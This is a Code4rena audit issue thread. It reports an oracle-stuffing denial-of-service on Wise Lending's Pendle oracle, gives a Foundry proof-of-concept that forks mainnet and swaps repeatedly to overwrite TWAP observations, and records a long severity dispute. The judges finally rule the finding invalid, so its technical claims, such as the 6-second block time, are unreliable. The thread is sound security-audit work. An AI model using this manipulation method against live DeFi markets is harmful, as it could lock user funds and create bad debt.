code-423n4 / 2024-02-wise-lending-findings

An attacker can make Pendle Oracle revert, locking liquidations, deposits, withdrawals, and everything else that uses this oracle #86

Closed c4-bot-4 closed 6 months ago

c4-bot-4 commented 7 months ago

Lines of code

https://github.com/code-423n4/2024-02-wise-lending/blob/1240a22a3bbffc13d5f8ae6300ef45de5edc7c19/contracts/DerivativeOracles/PendleLpOracle.sol#L112-L115

Vulnerability details

Summary

An attacker can update the Pendle oracle every block, filling all the observation slots. The oldest observation then becomes more recent than TWAP_TIME ago, so lookups revert with OracleTargetTooOld.

Vulnerability Details

  1. Oracle is set in:
    1. WiseOracleHub.addOracle => OracleHelper._addOracle => priceFeed[_tokenAddress]
    2. It can be pendleChildLpOracleInstance, as well as ptOracleDerivativeInstance and ptOraclePureInstance
  2. The oracle is called in many essential functions, including:
    1. Liquidations (WiseLending.liquidatePartiallyFromTokens => WiseCore._coreLiquidation => WiseOracleHub.getTokensInETH => WiseOracleHub.latestResolver => WiseOracleHub.chainLinkIsDead => OracleHelper._chainLinkIsDead => OracleHelper._getRoundTimestamp => PendleChildLpOracle.getRoundData => PendleChildLpOracle.latestAnswer => PendleLpOracle.latestAnswer => ORACLE_PENDLE_PT.getOracleState)
    2. Deposit
      • WiseOracleHub.chainLinkIsDead
        • WiseCore._checkDeposit
          • WiseCore._handleDeposit
            • WiseLending._depositExactAmountETH
              • WiseLending.depositExactAmountETH
              • WiseLending.depositExactAmountETHMint
            • WiseLending.depositExactAmount
    3. Withdraw
      • WiseOracleHub.getTokensInETH
        • WiseSecurityHelper._getTokensInEth
          • WiseSecurityHelper.getETHBorrow
            • WiseSecurityHelper.overallETHBorrowBare
              • WiseSecurity.checksWithdraw
                • WiseCore._coreWithdrawToken
                  • WiseLending._handleWithdrawShares
                    • WiseLending.withdrawExactShares
    4. Many more: borrow, recalibrate, view functions, etc.
  3. How it works on Pendle
    1. Pendle throws Errors.OracleTargetTooOld if we request a timestamp older than the oldest stored observation, e.g., the oldest observation is 10 minutes ago but we request 30 minutes ago. See here. Also see the PoC:
          // ensure that the target is chronologically at or after the oldest observation
          if (target < beforeOrAt.blockTimestamp) revert Errors.OracleTargetTooOld(target, beforeOrAt.blockTimestamp);
      1. The oldest observations are overwritten with the newest ones, see here and here
  4. Attacker steps (this can also happen naturally in the case of high activity and low cardinality)

    1. Call Pendle every block to write a new observation.
    2. If MAX_CARDINALITY is lower than TWAP_TIME / block_time, then after some time the Pendle oracle will start to revert with OracleTargetTooOld: the attacker has overwritten every observation slot, so the oldest observation is less than TWAP_TIME ago (see the ring-buffer sketch after this list).
    3. If the attacker expects the price of their collateral to decrease, they can borrow as much as possible and then run the attack. If the price drops by more than 5%, they profit: they keep more value than they would have otherwise, and the protocol is left with bad debt.
    4. If the price does not go down, they simply repay their loan and get their collateral back.

    During the attack, the team or other users can increase cardinality on Pendle, but restoring the pool will still take time, up to TWAP_TIME. Adding the time needed to diagnose the problem, the fix can be hours or even days away.
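
The overwrite mechanics can be illustrated with a minimal sketch, assuming a simplified Uniswap-style observation ring buffer (Pendle markets use the same pattern); the contract, names, and layout below are illustrative, not Pendle's actual storage:

// SPDX-License-Identifier: MIT
pragma solidity =0.8.24;

// Minimal sketch, not Pendle code: a fixed-size ring of observation
// timestamps, as used by Uniswap-style TWAP oracles.
contract ObservationRingSketch {

    uint16 public constant CARDINALITY = 180; // 180, the value used in the tests (AddressLibrary.MAX_CARDINALITY)

    uint32[180] public timestamps;
    uint16 public index;

    // Every trade writes one observation, overwriting the oldest slot.
    function write() external {
        index = (index + 1) % CARDINALITY;
        timestamps[index] = uint32(block.timestamp);
    }

    // After 180 consecutive per-block writes, the oldest surviving
    // observation is only 180 * block_time seconds old. Under the report's
    // assumed 6s spacing: 180 * 6 = 1080s < 1800s (TWAP_TIME), so a lookup
    // targeting (now - 1800) finds nothing at or before the target and
    // reverts, mirroring Errors.OracleTargetTooOld.
    function oldest() external view returns (uint32) {
        return timestamps[(index + 1) % CARDINALITY];
    }
}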

Impact

Pendle Oracle reverts, locking liquidations, deposits, withdrawals, and everything else that uses this oracle. How long the lock lasts depends on when the fix lands: at minimum TWAP_TIME - observations * block_time.
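
For illustration, with the numbers used in this report (TWAP_TIME = 1800 seconds, 180 observation slots, one observation every 6 seconds): 1800 - 180 * 6 = 720 seconds, i.e. at least 12 minutes of downtime even if mitigation begins immediately.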

Proof of Concept

Save the test as contracts/PowerFarms/PendlePowerFarmController/PendleRevert.t.sol and run:

forge test -f https://mainnet.infura.io/v3/[YOUR_KEY] -vvv --mt testOne --mc PendleRevert

// SPDX-License-Identifier: -- WISE --

pragma solidity =0.8.24;

import "./PendlePowerFarmControllerBase.t.sol";
import {
    PendleLpOracleLib,
    IPMarket,
    IStandardizedYield,
    MarketState as PendleMarketState
} from "@pendle/core-v2/contracts/oracles/PendleLpOracleLib.sol";

contract PendleRevert is PendlePowerFarmControllerBaseTest {
    error OracleTargetTooOld(uint32 target, uint32 oldest);
    address constant stEthWhale = 0xd8d041705735cd770408AD31F883448851F2C39d;

    function testOne() public normalSetup(true) {
        IPMarket market = IPMarket(AddressesMap[1].PendleMarketStEth);
        uint32 twapPeriod = 30 * 60;
        console.log(block.timestamp);

        (IStandardizedYield SY,,) = market.readTokens();
        (, address asset,) = SY.assetInfo();

        address attacker = stEthWhale;
        vm.startPrank(attacker);
        IERC20(asset).approve(address(SY), type(uint).max);
        (uint256 amountSharesOut) = SY.deposit(attacker, asset, 1_000 ether, 0);

        (,,,,uint16 observationCardinality,) = market._storage();
        console.log("observationCardinality", observationCardinality);
        _logObservations(market, 0);
        _logObservations(market, 1);

        SY.transfer(address(market), amountSharesOut);
        (,,,, observationCardinality,) = market._storage();
        console.log("observationCardinality after transfer", observationCardinality);

        for (uint i; i < 20; i++){
            _swapPercent(1, market);
            (,,,, observationCardinality,) = market._storage();
            console.log("observationCardinality after _swapPercent", i, observationCardinality);
            vm.roll(block.number + 1);
            vm.warp(block.timestamp + 6);
        }

        (,,,, observationCardinality,) = market._storage();
        console.log("observationCardinality", observationCardinality);
        for (uint i; i < observationCardinality + 2; i++){
            _logObservations(market, i);
        }

        // NOTE: the expectRevert arguments are fork-specific timestamps tied to
        // the mainnet block this test was pinned to; they will differ on other forks.
        vm.expectRevert(
            abi.encodeWithSelector(
                OracleTargetTooOld.selector, 1704376667, 1704378359
            )
        );
        this.getLpToAssetRate(market, twapPeriod);
    }

    // We need to wrap a library call because `expectRevert` only works for external calls, not internal
    // library calls
    function getLpToAssetRate(IPMarket market, uint32 twapPeriod) external view returns (uint256)  {
        return PendleLpOracleLib.getLpToAssetRate( market, twapPeriod );
    }

    function _logObservations(IPMarket market, uint index) internal {
        (uint32 blockTimestamp, uint216 lnImpliedRateCumulative, bool initialized) = market.observations(index);
        console.log("observations: ",blockTimestamp, lnImpliedRateCumulative, initialized);
    }

    function _swapPercent(uint percent, IPMarket market) internal returns (bool success) {
        assert(percent <= 100);
        PendleMarketState memory _storage = market.readState(address(0));
        assert(_storage.totalPt >= 0);

        uint totalPtToWithdraw = uint(_storage.totalPt) * percent / 100;
        uint ptOut = (1000 ether < totalPtToWithdraw) ? 1000 ether : totalPtToWithdraw;
        // console.log("ptOut: %e", ptOut);

        try market.swapSyForExactPt(address(this), ptOut, "") returns (uint256 netSyIn, uint256 netSyFee) {
            // console.log("%e\n%e", netSyIn, netSyFee);
        } catch {
            return false;
        }
        return true;
    }
}

Tools Used

Manual review

Recommended Mitigation Steps

  1. When adding an oracle, check that the market's cardinality is at least 60*30 / 6 on Ethereum, and at least 60*30 / block_time on other chains.
  2. Increase MAX_CARDINALITY to the same values as well.
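
A minimal sketch of mitigation 1, assuming the check is added at oracle construction time (the interface fragment below mirrors the _storage() tuple shape destructured in the PoC; the blockTime parameter and error name are illustrative additions, not existing code):

// SPDX-License-Identifier: MIT
pragma solidity =0.8.24;

// Mirrors the tuple shape of market._storage() as used in the PoC above.
interface IPMarketStorage {
    function _storage()
        external
        view
        returns (int128, int128, uint96, uint16, uint16, uint16);
}

contract CardinalityCheckedOracle {

    error CardinalityTooLow(uint16 have, uint256 need);

    uint32 public immutable TWAP_DURATION;

    // blockTime: ~12 on Ethereum mainnet, lower on faster chains; passing it
    // as a parameter lets the same check adapt per chain.
    constructor(
        address _pendleMarket,
        uint32 _twapDuration,
        uint32 _blockTime
    )
    {
        (,,,, uint16 cardinality,) = IPMarketStorage(_pendleMarket)._storage();

        // One observation slot must survive for every block inside the TWAP
        // window, e.g. 60 * 30 / 6 = 300 under the report's assumptions.
        uint256 required = _twapDuration / _blockTime;

        if (cardinality < required) {
            revert CardinalityTooLow(cardinality, required);
        }

        TWAP_DURATION = _twapDuration;
    }
}

This would complement the read-time ORACLE_PENDLE_PT.getOracleState() check the oracle already performs in latestAnswer().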

Assessed type

Oracle

c4-pre-sort commented 7 months ago

GalloDaSballo marked the issue as sufficient quality report

c4-pre-sort commented 7 months ago

GalloDaSballo marked the issue as primary issue

vm06007 commented 7 months ago

will need @vonMangoldt to look into this one

c4-judge commented 7 months ago

trust1995 marked the issue as satisfactory

c4-judge commented 7 months ago

trust1995 marked the issue as selected for report

stalinMacias commented 7 months ago

Hey @trust1995 , I've been reading this report and I can't see how this supposed problem has something to do with the contracts of the scope

All the references made in the report point to contracts of Pendle, not the PendleLpOracle which is in scope. Even the PoC interacts entirely with the Pendle contracts instead of the PendleLpOracle; the function that reverts in the PoC doesn't even call the PendleLpOracle, it just calls a contract from Pendle.

In the recommendation, the reporter suggests increasing MAX_CARDINALITY. I've checked all the places where MAX_CARDINALITY is used in the contracts in scope, and the only place it is used is PendlePowerFarmToken.initialize(), which receives the max cardinality as a parameter. That initialize() function is called from PendlePowerFarmTokenFactory._clone(), which also receives the max cardinality as a parameter, and the only entity that can call PendlePowerFarmTokenFactory.deploy() to deploy a new PendlePowerFarmToken is the PENDLE_POWER_FARM_CONTROLLER, which calls it from PendlePowerFarmController.addPendleMarket(), again receiving the max cardinality as a parameter. So, if the max cardinality is received as a parameter, how is this a valid issue? Only the master can call addPendleMarket(), so it is their responsibility to set an appropriate value.

Could you take a second look at the validity of this issue?

00xSEV commented 7 months ago

I've been reading this report and I can't see how this supposed problem has something to do with the contracts of the scope

This is an issue with oracle integration + oracle manipulation. To demonstrate how the oracle can be manipulated, I need to interact with it.

I believe I have shown where the oracle is utilized in the 'Vulnerability Details' section. I think it was made sufficiently clear that if Pendle were to start reverting, all the mentioned functions would also revert. To prove that making the oracle revert is possible, I provided a PoC.

In the recommendation, the reporter suggests increasing the MAX_CARDINALITY.

This is an additional recommendation. It is more important to ensure that the cardinality is at least 60*30 / 6 on Ethereum, and at least 60*30 / block_time on other chains when adding.

If the max_cardinality is received as a parameter, how is this a valid issue? Only the master can call the addPendleMarket(), so it is their responsibility to set an appropriate value as the max_cardinality.

In all the tests, it is set to 180 (AddressLibrary.MAX_CARDINALITY). Also, it is set to 180 in DeployLibrary.

180 is not sufficient for Ethereum; it needs to be at least 60*30/6 = 300.

If it's not a novel bug, then at least it's not a well-known one, so we cannot assume the value will be set correctly.

Increasing the TWAP period can also trigger this bug, which can be unexpected.

But even if MAX_CARDINALITY is set correctly, the issue still exists until the cardinality is increased on Pendle as well. That does not happen immediately, because it requires enough calls to _increaseCardinalityNext(); an attacker can be faster in a new or less active market.

stalinMacias commented 7 months ago

If it's not a novel bug, then at least it's not a well-known one, so we cannot assume the value will be set correctly.

But we can also not assume the value will be set incorrectly. The duration passed to market.observe() comes from the TWAP_DURATION defined on the PendleLpOracle, and that value is set by the deployer, a.k.a. the protocol itself. Assessing the severity of a report on the assumption that the protocol will set an incorrect value should be considered QA, because the sole responsibility lies with an authorized entity; it is not as if the values can be manipulated at will by anybody to trigger the DoS.

contract PendleLpOracle {

    uint256 internal constant DEFAULT_DECIMALS = 18;

    constructor(
        ...
        uint32 _twapDuration
    )
    {
        ...

        //@audit => TWAP_DURATION is set based on a parameter, it is not a hardcoded value. 
        TWAP_DURATION = _twapDuration;

       ...

    }

    function latestAnswer()
        public
        view
        returns (uint256)
    {
        ...

       //@audit => The duration that is passed to the PENDLE_ORACLE is based on the TWAP_DURATION (which the protocol is responsible to set)
        (
            bool increaseCardinalityRequired,
            ,
            bool oldestObservationSatisfied
        ) = ORACLE_PENDLE_PT.getOracleState(
            PENDLE_MARKET_ADDRESS,
            TWAP_DURATION
        );

        ...

        uint256 lpRate = _getLpToAssetRateWrapper(
            IPMarket(PENDLE_MARKET_ADDRESS),
            TWAP_DURATION
        );

        ...
    }

In all the tests, it is set to 180 (AddressLibrary.MAX_CARDINALITY). Also, it is set to 180 in DeployLibrary.

All the tests, as well as the DeployLibrary are out of scope.

@trust1995 I think that assessing the severity of a report as high based on the assumption that the protocol will set incorrect values is overblown. That kind of issue, which can only occur because of the admins, sounds more like QA rather than high/medium; it is also important to take into consideration that the tests as well as the DeployLibrary are OOS.

trust1995 commented 6 months ago

Thanks go to both sides for presenting good arguments. The issue stems from supplying a MAX_CARDINALITY that is not safe in relation to the blockchain being deployed on. We have no in-scope contracts to reference for the value of MAX_CARDINALITY. Therefore we must consider the likelihood of the admin being aware of the inequality they have to satisfy to be safe from oracle-stuffing attacks. For the purpose of understanding the admin's intentions, I believe it is valid to look at the test suite. Also, to the best of my knowledge, the team did not document this assumption at any point. Therefore, and I realize this will be a contentious decision, I am inclined to view the submission as in-scope, under the principle of erring on the side of caution (it is better for teams to receive issues they know about than to not receive issues they don't). The impact, if applicable, is high (core functionality shutdown).

stalinMacias commented 6 months ago

@trust1995 I think for the severity of the report, it is important to also consider the likelihood, which, because it depends on an admin setting a wrong value, I'm inclined to see as low; unless admins set wrong values, the presented issue is not applicable. As for the impact, it looks like it can be high, but it solely depends on the admins setting wrong values. Thus, we have high impact / low likelihood; shouldn't that make the severity medium?

I really think that assigning high severity to a report whose core issue depends on admins setting wrong values doesn't qualify as high severity.

0xCiphky commented 6 months ago

In my opinion, labelling this finding as "high" is overly generous. Despite its significant impact, when considering other factors, this assessment should be downgraded.

trust1995 commented 6 months ago

The new comments are stating points that were already known and considered. No change will be made based on those.

stalinMacias commented 6 months ago

If we stick to the c4 rules, this report matches all the criteria of "Centralization Risks" & Verdict: Severity Standardization - Centralization risks

Reckless admin mistakes are invalid. Assume calls are previewed.

Mistakes in code only unblocked through admin mistakes should be submitted within a QA Report.

@trust1995, pardon the insistence, but I find it very unfair to grade a high severity for a report whose issue can only occur if admins make a mistake; as per the rules, admin mistakes should be part of the QA report.

trust1995 commented 6 months ago

Calling this an admin mistake is completely butchering the term "admin mistake". The described behavior is very sneaky and we have no information that the admin would take it into consideration; on the contrary, all testing shows they would deploy with an incorrect configuration. The "admin mistake" that is capped to QA relates to reckless mistakes, e.g., inputting an unreasonable collateral factor, setting governance to a zero address, and so on. The issue is now finalized; additional raising of the same arguments will force a warning.

vm06007 commented 6 months ago

Calling this an admin mistake is completely butchering the term "admin mistake". The described behavior is very sneaky and we have no information that the admin would take it into consideration; on the contrary, all testing shows they would deploy with an incorrect configuration. The "admin mistake" that is capped to QA relates to reckless mistakes, e.g., inputting an unreasonable collateral factor, setting governance to a zero address, and so on. The issue is now finalized; additional raising of the same arguments will force a warning.

Admin mistakes were specifically marked as out of scope

vm06007 commented 6 months ago

Also, to the best of my knowledge the team did not document this assumption at any point

This is where there is a false assumption. It was documented, not only here but also in the hats.finance competition, that this is out of scope, the same as any findings from Hats, including centralization topics or admin decisions on what parameters to use when deploying contracts, creating new pools, etc.

By the same logic you could then raise any issue about an admin mistakenly (or deliberately) using a wrong, malicious, or corrupt token address for new pool creation in order to rug the entire protocol.

trust1995 commented 6 months ago

@vm06007 Can you provide links to evidence you were aware of the specific requirement around MAX_CARDINALITY? Otherwise the decision will have to stand.

stalinMacias commented 6 months ago

Hey @trust1995, I think we have the evidence right in front of us: the files/contracts where the values were pulled from are out of scope, which could mean the values are not yet final, i.e., they were set for testing purposes. If we look across the codebase, there are a couple of places indicating the codebase will go through further changes, especially the oracles... here, here & here

In a recent contest, there was a very similar case of a finding based on contracts out of scope, and the way the judgment was handled was fair for all parties, imho. Why don't we let the sponsor decide if the finding should be deemed in-scope or not?

trust1995 commented 6 months ago

@stalinMacias I asked the sponsor a very particular question, that is not an opportunity to interpose and raise additional arguments for the 5th time. Pls do not further engage.

vm06007 commented 6 months ago

@vm06007 Can you provide links to evidence you were aware of the specific requirement around MAX_CARDINALITY? Otherwise the decision will have to stand.

I believe @vonMangoldt should have this info as the original implementer, but I would also take into consideration what @stalinMacias already outlined above and not ignore those comments. If we use those comments from the sponsor's GitHub account as an argument, would they be ignored as well?

GalloDaSballo commented 6 months ago

Summary of the issue

If using an oracle that doesn't enforce sufficient cardinality, it's possible for the oracle to include only prices that are too recent, causing all reads to fail.

Discussion

Alex: I highly suggest going on a real market and reviewing the Pendle code: https://etherscan.io/address/0x66a1096C6366b2529274dF4f5D8247827fe4CEA8#readContract getOracleState 0xb4460e76D99eCaD95030204D3C25fb33C4833997 with whatever cardinality you want

https://docs.pendle.finance/Developers/Deployments/Ethereum. It's worth considering whether this is at all possible, as the cardinality check seems to require that one observation per block is opened. I'll need to review, but it seems to me that increaseCardinalityRequired enforces a minimum cardinality that cannot be manipulated.

Alex: From reviewing this: https://github.com/pendle-finance/pendle-core-v2-public/blob/0e9e00b287713b5d220ada02db45bd617db31e89/contracts/oracles/PendlePtOracle.sol

Pendle messed up the values and should have used 11000. Pendle "fixed it" by setting the cardinality numerator to 1000 (so it's basically 1-1). Pendle oracles require one cardinality per second.

The finding seems invalid or at the very least missing critical details about a specific real oracle that has that risk

Hickuphh3: I've a contact at Pendle, asked him about how they set cardinality: market.increaseObservationsCardinalityNext(duration).

Since this might cost a lot of gas and may exceed the block limit, you may have to increase it gradually with multiple transactions. For example:

"regarding initialisation, it depends on who initialised it. So by default, there's no observations afaik" https://arbiscan.io/txs?a=0x5E03C94Fc5Fb2E21882000A96Df0b63d2c4312e2&p=19 can see that someone called increaseObservationsCardinalityNext first, then the pendle deployer Arbitrum (ETH) Blockchain Explorer Arbitrum Transactions Information | Arbiscan Transactions that have been validated and confirmed on the Arbitrum Blockchain. The list consists of transactions from sending ETH and the transactions for interacting with a smart contract. "Yeah usually not by us. We always tell integrators to initialize themselves haha"

uint32 duration = 1; // FOR MAINNET USE 30 MIN !

if twapDuration = 30 mins (1800s), you'd need a cardinality of 150, assuming block times of 12s, no? Would 180 therefore suffice?

Alex: But with the config I found, for 1800 -> you get 1800

Are you able to find a pendle oracle where the math would be different from the one I sent?

Hickuphh3: Numerator's set to 10_000, not 1000

Alex: This would still be safe though, as it's asking for more than one cardinality slot per expected block.

I think we could check the chain for all oracles to determine if one of them matches the requirements. But unless I'm missing something, this is leaning towards an incorrect setting, as the defaults by Pendle are safe from the exploit.
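
A rough sketch of the relationship being discussed, assuming a fixed 10_000 denominator so that the numerator of 10_000 Hickuphh3 quotes below gives the 1:1 ratio Alex describes ("for 1800 -> you get 1800"); the library, names, and formula are illustrative, and the real check lives in Pendle's PendlePtOracle:

// SPDX-License-Identifier: MIT
pragma solidity =0.8.24;

// Illustrative only; not Pendle's implementation.
library CardinalityMathSketch {
    function requiredCardinality(
        uint32 twapDuration,
        uint16 cardinalityNumerator
    )
        internal
        pure
        returns (uint32)
    {
        // numerator = 10_000 => one observation slot per second of the TWAP
        // window, so twapDuration = 1800 yields a required cardinality of 1800.
        return uint32(uint256(twapDuration) * cardinalityNumerator / 10_000);
    }
}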

Hickuphh3: "Attacker steps (or can happen naturally in case of high activity low cardinality): i. Call Pendle every block to write a new observation; ii. If MAX_CARDINALITY is lower than TWAP_TIME / block_time then after some time the Pendle oracle will start to revert with OracleTargetTooOld. Attacker updated all the observation slots. The oldest observation is < TWAP_TIME ago."

If we assume the test / deploy value of MAX_CARDINALITY = 180, TWAP_TIME of 1800, constant mainnet block time of 12s, then MAX_CARDINALITY > TWAP_TIME / block_time = 1800 / 12 = 150. Not sure why the warden says it needs to be minimally 60 * 30 / 6 => assumes block time of 6s on mainnet?

One can argue that the increase to MAX_CARDINALITY might be slow, one at a time:

function _increaseCardinalityNext() internal {
    MarketStorage memory storageMarket = PENDLE_MARKET._storage();

    if (storageMarket.observationCardinalityNext < MAX_CARDINALITY) {
        PENDLE_MARKET.increaseObservationsCardinalityNext(
            storageMarket.observationCardinalityNext + 1
        );
    }
}

and the described attack method to DoS the protocol would thus be applicable to markets with observationCardinalityNext less than 150, like this pufETH pool (which hasn't had its cardinality increased): https://etherscan.io/address/0x17BE998a578fD97687b24E83954FEc86Dc20c979#readContract

But this is a separate issue and while related, isn't what the main issue covers.

The raised issue is about MAX_CARDINALITY being insufficiently high, which isn't true. Am therefore leaning towards invalid / QA at best

Alex: Please correct me if I'm wrong, but the market can have low cardinality and that's a setting that would be missing

Wise would integrate via an oracle that would calculate the required cardinality, in the market you linked, the oracle would return false and as such the oracle would not be usable until the cardinality is raised

For the risk to be valid, we would need to find an oracle for which the cardinality requirement is met, but where stuffing observations on each block can cause the freshness check to fail.

And afaict there's no such oracle implementation / it would require a gross misconfiguration. Unless I'm wrong here, I would consider this QA / Invalid as well, specifically because:

  • There is no reasonable oracle implementation that presents the risk
  • Raising cardinality can be done post-factually, so this can be prevented after the first instance
  • It requires misconfiguration in the vast majority of cases, as the defaults from Pendle seem safe to me

Hickuphh3: it's odd that they do the cardinality check in latestAnswer() and not in the constructor when the market and TWAP duration are set: https://github.com/code-423n4/2024-02-wise-lending/blob/1240a22a3bbffc13d5f8ae6300ef45de5edc7c19/contracts/DerivativeOracles/PtOracleDerivative.sol#L100-L115

agree that it would require a misconfiguration that can be avoided by shifting / duplicating the checks (or at the very least, the cardinality check) into the constructor

LSDan: I'm aligned with invalid on this one. In my opinion it should have been added to analysis as an admin misconfiguration risk. I have nothing that meaningfully adds context besides what is pointed out above. This is further backed by the idea that admin risk is out of scope. A severe issue can still be reported as admin risk in Analysis and considered for a bounty after the fact if it provides major value to the sponsor.

Deliberation

Unanimously close the issue as invalid

Additional Context by the Lead Judge

This is an example of a report where the attack seems plausible in a vacuum

However, after reading the Pendle documentation and going through a good number of real implementations, it seemed clear that the attack was not valid, but rather an integration mistake for engineers rolling their own oracle

It’s important to note that the original report should have linked to a misconfigured oracle in order to make its case, and because we were unable to reasonably find one, we must conclude that this is a case of an admin mistake that should have been sent as part of the Analysis

trust1995 commented 6 months ago

Judge's Response

  1. The Supreme Court criticized the technical validity of the finding. I have no objections to their technical assessment.
  2. It must be noted that all discussion with the sponsor and 3rd-party wardens did not raise concerns over the technical validity of the finding; it focused on whether setting MAX_CARDINALITY incorrectly is considered an admin mistake. Similar to how we ruled that appeals cannot be made when there was no flagging during PJQA, it seems to me that an after-the-fact technical-validity discussion should not change the dispute resolution.
  3. I remain of the opinion that the "owner mistake" clause is not applicable in this instance: it doesn't fall under the clear-mistakes category, it cannot be previewed, and there's no supporting evidence that the owner is aware of the misconfiguration.

vm06007 commented 6 months ago

Unanimously close the issue as invalid

👏👏👏